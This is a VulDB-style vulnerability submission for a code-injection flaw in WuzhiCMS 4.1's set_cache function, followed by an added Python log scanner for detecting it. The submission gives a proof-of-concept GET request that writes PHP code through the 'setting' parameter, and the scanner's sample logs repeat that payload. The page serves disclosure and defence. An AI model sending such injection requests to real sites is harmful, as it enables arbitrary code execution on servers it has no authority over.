Submit #549270: wuzhicms 4.1 Code Injection

Title: wuzhicms 4.1 Code Injection

Description:

Vulnerability Description

A file upload vulnerability exists in the set_cache function under the set module of WuzhiCMS 4.1. Attackers with administrator privileges can write malicious code into files on the server via the setting parameter, leading to arbitrary code execution. This vulnerability allows attackers to create or overwrite files on the server, thereby executing arbitrary PHP code.

Code Audit Process

By analyzing the code of WuzhiCMS 4.1, it was discovered that the set_cache function does not adequately filter or validate the setting parameter during processing, directly writing the content of the setting parameter into a file.

POC

    GET /index.php?m=attachment&f=index&_su=wuzhicms&v=set&submit=1&setting=%3C?php%20echo%20phpinfo()?%3E HTTP/1.1
    Host: target-ip
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close

Source: ⚠️ https://wiki.shikangsi.com/post/share/915aeba9-7d7c-4d7f-92e2-bbd5560de1a7
User: XingYue_Mstir (UID 72225)
Submission: 04/02/2025 12:02 PM (4 months ago)
Moderation: 04/14/2025 12:46 AM (12 days later)
Status: Accepted
VulDB Entry: 304604 [WuzhiCMS 4.1 Setting set code injection]
Points: 20
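
For defenders reviewing web server logs, the following added example (not part of the submission and not WuzhiCMS code) flags requests matching the pattern in the description: a PHP open tag in the setting parameter sent to m=attachment with v=set. It assumes combined-format access logs; the log lines and the scan function are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-log-format fields we need: client, timestamp, request target.
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# Any PHP open tag (<?php, <?=, short <?) in a settings value is anomalous.
PHP_TAG_RE = re.compile(r"<\?")

def scan(lines):
    """Return one finding per request that sends a PHP open tag in
    `setting` to the attachment module's `set` action."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed or non-request line
        # parse_qs percent-decodes each value once, as PHP does for $_GET.
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        if params.get("m") != ["attachment"] or params.get("v") != ["set"]:
            continue
        for value in params.get("setting", []):
            if PHP_TAG_RE.search(value):
                findings.append(
                    {"client": m["client"], "time": m["ts"], "setting": value}
                )
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Apr/2025:12:02:11 +0000] "GET /index.php?m=attachment'
    '&f=index&_su=wuzhicms&v=set&submit=1&setting=%3C?php%20echo%20phpinfo()?%3E'
    ' HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [02/Apr/2025:12:03:40 +0000] "GET /index.php?m=attachment'
    '&f=index&_su=wuzhicms&v=set&submit=1&setting=1 HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [02/Apr/2025:12:04:02 +0000] "GET /index.php?m=content'
    '&f=index&v=listing HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    'truncated line without a request field',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs record only the query string, so a request that carries setting in a POST body needs the same check applied at a WAF or in application-level logging.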
